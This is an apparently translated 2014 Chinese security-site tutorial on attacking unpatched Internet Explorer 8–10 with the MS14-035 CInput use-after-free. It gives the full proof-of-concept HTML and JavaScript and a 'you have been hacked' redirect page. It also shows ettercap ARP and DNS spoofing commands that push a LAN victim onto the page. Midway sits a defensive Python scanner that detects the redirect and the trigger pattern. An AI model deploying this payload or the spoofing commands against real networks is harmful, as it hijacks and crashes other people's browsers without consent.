Using "MS14-035" to attack the IE browser - vulnerability warning - the black bar safety net

2014-09-27T00:00:00
ID MYHACK58:62201454110
Type myhack58
Reporter 佚名
Modified 2014-09-27T00:00:00

Description

  • This vulnerability can crash Internet Explorer; the affected versions are IE8, 9 and 10. Microsoft released the update patch on 10 June 2014, so the attack now only works against IE browsers that have not been updated since 10 June of this year. Details are here:

http://www.exploit-db.com/exploits/33860/

As described above, exploiting this vulnerability requires a piece of HTML code. Below I demonstrate the attack from my own machine inside a LAN; the target is a Win7 SP1 virtual machine running IE9.

First, modify index.html in the /var/www directory to the following:

<html>
<head>
<meta http-equiv="refresh" content="5;url=http://192.168.1.29/poc.html">
<title>YOU HAVE BEEN HACKED</title>
</head>
<body>
you have been hacked,and you will shutdown!!
</body>
</html>

This is the page the target opens first. It displays "you have been hacked,and you will shutdown!!" as a bit of intimidation; then the meta refresh (content="5;...") automatically opens, after 5 seconds, the page containing the IE vulnerability HTML, which here is http://192.168.1.29/poc.html. Create a new poc.html in the same directory with the following content (you can also simply change index.html to this content directly):

<html>
<head><title>MS14-035 Internet Explorer CInput Use-after-free POC</title></head>
<body>
<form id="testfm">
  <textarea id="child" value="a1" ></textarea>
  <input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
  <textarea id="child3" value="a2" ></textarea>
  <input type="text" name="test1">
</form>
<script>
var startfl=false;
function changer() {
  // The changer function is called from inside mshtml!CFormElement::DoReset; after
  // this function returns, DoReset crashes when it accesses the freed CInput element.
  if (startfl) {
    document.getElementById("testfm").innerHTML = ""; // Destroy form contents, freeing the next CInput that DoReset will touch
    CollectGarbage();
  }
}
document.getElementById("child2").checked = true;
document.getElementById("child2").onpropertychange = changer; // handler fires when reset() changes the checkbox
startfl = true;
document.getElementById("testfm").reset(); // DoReset call
</script>
</body>
</html>
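From the defender's side, the two pages above have a recognisable shape: a meta refresh that bounces the browser to a different host, and a script whose onpropertychange handler empties a form and forces garbage collection before reset() runs. The following is an added example (not from the original write-up or exploit-db) of a heuristic scanner for served HTML that flags both; the sample pages are constructed here and the served hostname "www.example.com" is an assumption.

```python
import re
from urllib.parse import urlparse

# Constructed samples modelled on the write-up: the redirect page, the UAF trigger, and a benign page.
REDIRECT_PAGE = """<html><head>
<meta http-equiv="refresh" content="5;url=http://192.168.1.29/poc.html">
<title>YOU HAVE BEEN HACKED</title></head><body>you have been hacked</body></html>"""

POC_PAGE = """<html><body><form id="testfm"><input id="child2" type="checkbox"></form>
<script>
var startfl=false;
function changer(){ if(startfl){ document.getElementById("testfm").innerHTML="";
CollectGarbage(); } }
document.getElementById("child2").onpropertychange=changer;
startfl=true;
document.getElementById("testfm").reset();
</script></body></html>"""

BENIGN_PAGE = """<html><head><meta http-equiv="refresh" content="30"></head>
<body><form id="f"><input type="text"></form>
<script>document.getElementById("f").reset();</script></body></html>"""


def scan_html(html: str, served_host: str) -> list[str]:
    """Return heuristic findings for an HTML document the client received from served_host."""
    findings = []
    # 1. A meta refresh whose url= points at a host other than the one that served the page.
    for tag in re.findall(r"<meta[^>]*>", html, re.I):
        if not re.search(r"""http-equiv=["']refresh["']""", tag, re.I):
            continue
        content = re.search(r"""content=["']([^"']*)["']""", tag, re.I)
        url_part = content and re.search(r"url=(\S+)", content.group(1), re.I)
        if url_part:
            target = urlparse(url_part.group(1)).hostname
            if target and target != served_host:
                findings.append(f"meta-refresh-redirect:{target}")
    # 2. The MS14-035 CInput UAF trigger: an onpropertychange handler that clears a form's
    #    innerHTML and calls CollectGarbage(), driven by a form reset(). All four must be present.
    script = " ".join(re.findall(r"<script[^>]*>(.*?)</script>", html, re.I | re.S))
    markers = [r"\.onpropertychange\s*=", r"""\.innerHTML\s*=\s*["']{2}""",
               r"CollectGarbage\s*\(", r"\.reset\s*\("]
    if all(re.search(p, script) for p in markers):
        findings.append("ms14-035-cinput-uaf-trigger")
    return findings
```

A proxy or web filter can run scan_html over inbound HTML and alert on either finding; the second pattern is specific enough that false positives on ordinary pages are rare.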

Then start apache2 and use ettercap for DNS spoofing:

service apache2 start

ettercap -TqP dns_spoof -M arp:remote /192.168.1.27/ //

See the following effect:

[screenshot of the result; image not included in this copy]